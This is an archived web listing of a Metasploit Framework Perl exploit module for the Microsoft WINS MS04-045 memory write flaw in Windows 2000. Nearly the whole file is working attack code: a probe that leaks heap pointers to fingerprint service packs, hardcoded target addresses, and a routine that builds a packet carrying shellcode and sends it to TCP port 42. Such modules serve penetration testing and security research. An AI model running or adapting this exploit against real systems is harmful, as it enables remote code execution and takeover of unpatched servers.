home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / wins_ms04_045.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  8.1 KB  |  301 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::wins_ms04_045;
  11. use base "Msf::Exploit";
  12. use strict;
  13.  
  14. my $advanced =
  15.   {
  16.     'BASE'    => [0, 'Specify the exact address to the structure'],
  17.     'TARG'    => [0, 'Specify the exact address to overwrite'],
  18.     'WHAT'    => [0, 'Specify the data used to overwrite the address'],
  19.   };
  20.  
  21. my $info =
  22.   {
  23.     'Name'    => 'Microsoft WINS MS04-045 Code Execution',
  24.     'Version' => '$Revision: 1.24 $',
  25.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
  26.  
  27.     'Arch'  => [ 'x86' ],
  28.     'OS'    => [ 'win32', 'win2000' ],
  29.     'Priv'  => 1,
  30.  
  31.     'AutoOpts'  => { 'EXITFUNC' => 'process' },
  32.     'UserOpts'  =>
  33.       {
  34.         'RHOST'  => [1, 'ADDR', 'The target address'],
  35.         'RPORT'  => [1, 'PORT', 'The target port', 42],
  36.       },
  37.  
  38.     'Payload' =>
  39.       {
  40.         'Space'     => 8000,
  41.         'MinNops'    => 512,
  42.         'Prepend'    => "\x81\xc4\x54\xf2\xff\xff",    # add esp, -3500
  43.         'Keys'         => ['+ws2ord'],
  44.       },
  45.  
  46.     'Description'  => Pex::Text::Freeform(qq{
  47.         This module exploits a arbitrary memory write flaw in the WINS service. This
  48.     exploit has been tested against Windows 2000 only.
  49. }),
  50.  
  51.     'Refs'  =>
  52.       [
  53.         ['OSVDB',   '12378'],
  54.         ['MSB',     'MS04-045'],
  55.         ['MIL',     '78'],
  56.       ],
  57.  
  58.     'Targets'   =>
  59.       [
  60.         ['Windows 2000 English', [ 0x5391f40 ], 0x53df4c4, 0x53922e0]
  61.       ],
  62.  
  63.     'Keys'  =>  ['wins'],
  64.  
  65.     'DisclosureDate' => 'Dec 14 2004',
  66.   };
  67.  
  68. sub new {
  69.     my $class = shift;
  70.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  71.     return($self);
  72. }
  73.  
  74. sub Check {
  75.     my $self = shift;
  76.     my $target_host = $self->GetVar('RHOST');
  77.     my $target_port = $self->GetVar('RPORT');
  78.  
  79.     my ($ret, $fprint, $check) = @{ $self->Fingerprint };
  80.  
  81.     if ($ret < 0) {
  82.         return $check;
  83.     }
  84.  
  85.     if ($ret == 0) {
  86.         $self->PrintLine("[*] This system does not appear to be vulnerable.");
  87.         return $check;
  88.     }
  89.  
  90.     $self->PrintLine("[*] This system appears to be vulnerable.");
  91.     if ($fprint->{'os'} ne '?') {
  92.         my $os = $fprint->{'os'} eq '?' ? 'Unknown Windows' : 'Windows '. $fprint->{'os'};
  93.         my $sp = $fprint->{'sp'} eq '?' ? '' : 'SP '. $fprint->{'sp'};
  94.         my $vi = $fprint->{'vi'} == 1 ? '(clean heap)' : '(dirty heap)';
  95.         my $hp = length($sp) ? $vi : '';
  96.         $self->PrintLine("[*] Host $target_host is $os $sp $hp");
  97.     }
  98.  
  99.     return $self->CheckCode('Safe');
  100. }
  101.  
  102. sub Exploit {
  103.     my $self = shift;
  104.     my $target_host = $self->GetVar('RHOST');
  105.     my $target_port = $self->GetVar('RPORT');
  106.     my $target_idx  = $self->GetVar('TARGET');
  107.  
  108.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  109.  
  110.     my $target = $self->Targets->[$target_idx];
  111.  
  112.     if (! $self->InitNops(128)) {
  113.         $self->PrintLine("[*] Failed to initialize the nop module.");
  114.         return;
  115.     }
  116.  
  117.     # Sanity check the WINS service
  118.     my ($ret, $fprint, $check) = @{ $self->Fingerprint };
  119.  
  120.     if ($ret <= 0) {
  121.         $self->PrintLine("[*] The target system does not appear to be vulnerable.");
  122.         return;
  123.     }
  124.  
  125.     # Windows 2000 SP0, SP2, SP3, SP4 only. SP1 does not have the
  126.     # same function pointer...
  127.     if ($fprint->{'os'} ne '2000' || $fprint->{'sp'} !~ /^[0234]/ ) {
  128.         $self->PrintLine("[*] The target system is not currently supported");
  129.         return;
  130.     }
  131.  
  132.     # This flag is un-set if the first leaked address is not the default of
  133.     # 0x05371e90. This can indicate that someone has already tried to exploit
  134.     # this system, or something major happened to the heap that will probably
  135.     # prevent this exploit from working.
  136.     if (! $fprint->{'vi'}) {
  137.         $self->PrintLine("[*] The leaked heap address indicates that this attack may fail.");
  138.     }
  139.  
  140.     # Allow for multiple attempts to find the base address
  141.     # XXX - Brute force not implemented (or required so far)
  142.     my @rloc = @{ $target->[1] };
  143.  
  144.     # Address of the function pointers to overwrite (courtesy anonymous donor)
  145.     my $targ = $target->[2];
  146.  
  147.     # Address of the payload on the heap, past the structure
  148.     my $code = $target->[3];
  149.  
  150.     # Advanced options can be used to overwrite
  151.     @rloc = ( hex($self->GetVar('BASE')) ) if $self->GetVar('BASE');
  152.     $targ = hex($self->GetVar('TARG')) if $self->GetVar('TARG');
  153.     $code = hex($self->GetVar('WHAT')) if $self->GetVar('WHAT');
  154.  
  155.     foreach my $base (@rloc) {
  156.         my ($req, $add);
  157.  
  158.         # Pointing at any aligned address into top 36 bytes will result in a
  159.         # valid structure. This gives us some breathing room if things move
  160.         # around a little bit.
  161.         $add .= pack('V', $code) x 9;
  162.         $add .= pack('V', $targ - 0x48) x 14;
  163.  
  164.         # Multiple copies are used in case things slide a little bit
  165.         $req .= $add x 10;
  166.  
  167.         # Bling.
  168.         $req .= $shellcode;
  169.  
  170.         # Random padding :-)
  171.         $req .= Pex::Text::EnglishText(9200 - length($req));
  172.  
  173.         # Tack on the header
  174.         my $pkt = pack('NNN', length($req) + 8, -1, $base). $req;
  175.  
  176.         # Poink!
  177.         $self->PrintLine(sprintf("[*] Attempting to overwrite 0x%.8x with 0x%.8x (0x%.8x)", $targ, $code, $base));
  178.         my $s = Msf::Socket::Tcp->new
  179.           (
  180.             'PeerAddr'  => $target_host,
  181.             'PeerPort'  => $target_port,
  182.           );
  183.  
  184.         if ($s->IsError) {
  185.             $self->PrintLine("[*] Socket error: " . $s->GetError());
  186.             return(0);
  187.         }
  188.  
  189.         $s->Send($pkt);
  190.         $self->Handler($s);
  191.     }
  192.  
  193.     return;
  194. }
  195.  
  196. # This fingerprinting routine will cause the structure base address to slide down
  197. # 120 bytes. Subsequent fingerprints will not push this down any futher, however
  198. # we need to make sure that fingerprint is always called before exploitation or
  199. # the alignment will be way off.
  200.  
  201. sub Fingerprint {
  202.     my $self = shift;
  203.     my $target_host = $self->GetVar('RHOST');
  204.     my $target_port = $self->GetVar('RPORT');
  205.     my $fprint = {};
  206.  
  207.     # This results in vulnerable servers leaking back some useful
  208.     # pointers to the heap and to ntdll.dll. We can use these pointers
  209.     # to determine the service pack.
  210.  
  211.     my $req =
  212.       "\x00\x00\x00\x29\x00\x00\x78\x00\x00\x00\x00\x00".
  213.       "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x02\x00\x05".
  214.       "\x00\x00\x00\x00\x60\x56\x02\x01\x00\x1F\x6E\x03".
  215.       "\x00\x1F\x6E\x03\x08\xFE\x66\x03\x00";
  216.  
  217.     my $s = Msf::Socket::Tcp->new
  218.       (
  219.         'PeerAddr'  => $target_host,
  220.         'PeerPort'  => $target_port,
  221.       );
  222.  
  223.     if ($s->IsError) {
  224.         $self->PrintLine("[*] Socket error: " . $s->GetError());
  225.         return [-2, $fprint, $self->CheckCode('Connect') ];
  226.     }
  227.  
  228.     $s->Send($req);
  229.     my $res = $s->Recv(-1, 5);
  230.     if (! $res) {
  231.         $self->PrintLine("[*] No response to WINS probe.");
  232.         $s->Close;
  233.         return [-1, $fprint, $self->CheckCode('Connect') ];
  234.     }
  235.  
  236.     my @ptrs = ( unpack('N', substr($res, 16, 4)), unpack('VVV', substr($res, 32)) );
  237.     $self->PrintDebugLine(1, sprintf("[*] Pointers: [0x%.8x] 0x%.8x 0x%.8x 0x%.8x", @ptrs));
  238.  
  239.     my ($os, $sp, $vi) = ('2000', '?', '?');
  240.  
  241.     # Windows 2000 versions
  242.     $sp = '0'    if $ptrs[3] == 0x77f8ae78;
  243.     $sp = '1'    if $ptrs[3] == 0x77f81f70;
  244.     $sp = '2'    if $ptrs[3] == 0x77f82680;
  245.     $sp = '3'    if $ptrs[3] == 0x77f83608;
  246.     $sp = '4'    if $ptrs[3] == 0x77f89640;
  247.     $sp = '4++'    if $ptrs[3] == 0x77f82518;
  248.  
  249.     # Contributed by grutz[at]jingojango.net
  250.     $sp = '3/4' if $ptrs[3] == 0x77f81648;
  251.  
  252.     # Probably not Windows 2000...
  253.     $os = '?' if $sp eq '?';
  254.  
  255.     # Windows NT 4.0
  256.     if ($ptrs[0] > 0x02300000 && $ptrs[0] < 0x02400000) {
  257.         $os = 'NT';
  258.         $sp = '?';
  259.     }
  260.  
  261.     # Heap is still pristine...
  262.     $vi = 1 if $ptrs[0] == 0x05371e90;
  263.  
  264.     # Store the fingerprints....
  265.     $fprint->{'os'} = $os;
  266.     $fprint->{'sp'} = $sp;
  267.     $fprint->{'vi'} = $vi;
  268.  
  269.     # Probe to test vulnerability
  270.     $req =    "\x00\x00\x00\x0F\x00\x00\x78\x00". substr($res, 16, 4).
  271.       "\x00\x00\x00\x03\x00\x00\x00\x00";
  272.     $s->Send($req);
  273.     $res = $s->Recv(-1, 3);
  274.  
  275.     $s->Close;
  276.  
  277.     if (substr($res, 6, 1) eq "\x78") {
  278.         return [1, $fprint, $self->CheckCode('Appears') ];
  279.     }
  280.  
  281.     return [0, $fprint, $self->CheckCode('Safe') ];
  282. }
  283.  
  284. 1;
  285.  
  286. __END__
  287. SP0 [0x05371e90] 0x053dffa4 0x77fb80db 0x77f8ae78
  288. SP1 [0x05371e90] 0x0580ffa4 0x77fb9045 0x77f81f70
  289. SP2 [0x05371e90] 0x053dffa4 0x77fb9da7 0x77f82680
  290. SP3 [0x05371e90] 0x053dffa4 0x77f82b95 0x77f83608
  291. SP4 [0x05371e90] 0x053dffa4 0x77f98191 0x77f89640
  292. SP4 [0x00000040] 0x053dffa4 0x77f98191 0x77f89640 (patched)
  293. SP4 [0x0000003e] 0x053dffa4 0x77f81f55 0x77f82518 (mostly patched)
  294.  
  295. NT4 
  296. YES [0x023b1e98] 0x0014c3f0 0x00000048 0x00000000
  297. NOT [0x023d1dc8] 0x0014de60 0x00000048 0x0000023f
  298. YES [0x023b1ea0] 0x00000048 0x00000009 0x0000023e
  299.  
  300. 2K3 [0x00000040] 0x044bf584 0x01013c25 0x000003ac
  301.